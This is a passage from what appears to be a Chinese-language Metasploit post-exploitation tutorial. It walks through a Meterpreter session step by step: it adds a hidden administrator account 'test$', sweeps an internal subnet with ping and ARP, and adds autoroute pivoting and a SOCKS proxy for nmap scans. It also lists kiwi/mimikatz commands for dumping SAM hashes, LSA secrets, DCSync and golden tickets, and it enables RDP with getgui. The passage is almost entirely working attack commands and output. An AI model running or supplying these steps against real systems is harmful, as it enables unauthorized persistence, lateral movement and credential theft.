meterpreter > shell C:\Windows\system32>net user test$ 123456 /add & net localgroup administrators test$ /add
七、扫描内网存活主机
meterpreter> info post/multi/gather/ping_sweep meterpreter> run post/multi/gather/ping_sweep rhosts=10.10.10.1-10.10.10.5 meterpreter> run post/multi/gather/ping_sweep rhosts=10.10.10.0/24
这个模块会尝试ping内网的主机,如果有回包,说明该主机存活
meterpreter> info post/windows/gather/arp_scanner meterpreter> run post/windows/gather/arp_scanner rhosts=10.10.10.1-10.10.10.5 meterpreter> run post/windows/gather/arp_scanner rhosts=10.10.10.0/24
这个模块会尝试发送arp包,如果有回包,说明该主机存活
八、添加内网路由
meterpreter> run autoroute -s 10.10.10.0/24 meterpreter> run autoroute -p 或者 meterpreter> run post/multi/manage/autoroute
九、扫描内网主机开放的端口
通过MSF SOCKS代理模块,用nmap扫描内网主机开放的端口
(1)配置SOCKS代理
meterpreter> background msf6 exploit(multi/handler) > use auxiliary/server/socks_proxy msf6 auxiliary(server/socks_proxy) > set srvhost 192.168.1.8(Win2008的IP) msf6 auxiliary(server/socks_proxy) > exploit -j
Command Description ------- ----------- creds_all Retrieve all credentials (parsed) creds_kerberos Retrieve Kerberos creds (parsed) creds_livessp Retrieve Live SSP creds creds_msv Retrieve LM/NTLM creds (parsed) creds_ssp Retrieve SSP creds creds_tspkg Retrieve TsPkg creds (parsed) creds_wdigest Retrieve WDigest creds (parsed) dcsync Retrieve user account information via DCSync (unparsed) dcsync_ntlm Retrieve user account NTLM hash, SID and RID via DCSync golden_ticket_create Create a golden kerberos ticket kerberos_ticket_list List all kerberos tickets (unparsed) kerberos_ticket_purge Purge any in-use kerberos tickets kerberos_ticket_use Use a kerberos ticket kiwi_cmd Execute an arbitary mimikatz command (unparsed) lsa_dump_sam Dump LSA SAM (unparsed) 查看目标系统的 SAMdump: lsa_dump_secrets Dump LSA secrets (unparsed) 查看目标系统的密码 password_change Change the password/hash of a user wifi_list List wifi profiles/creds for the current user wifi_list_shared List shared wifi profiles/creds (requires SYSTEM)
可以看到明文密码123456(如果没有明文可以尝试暴力破解)
(4)开启远程桌面
Usage: run getgui -u <username> -p <password> Or: run getgui -e
OPTIONS:
-e Enable RDP only. -f <opt> Forward RDP Connection. -h Help menu. -p <opt> The Password of the user to add. -u <opt> The Username of the user to add.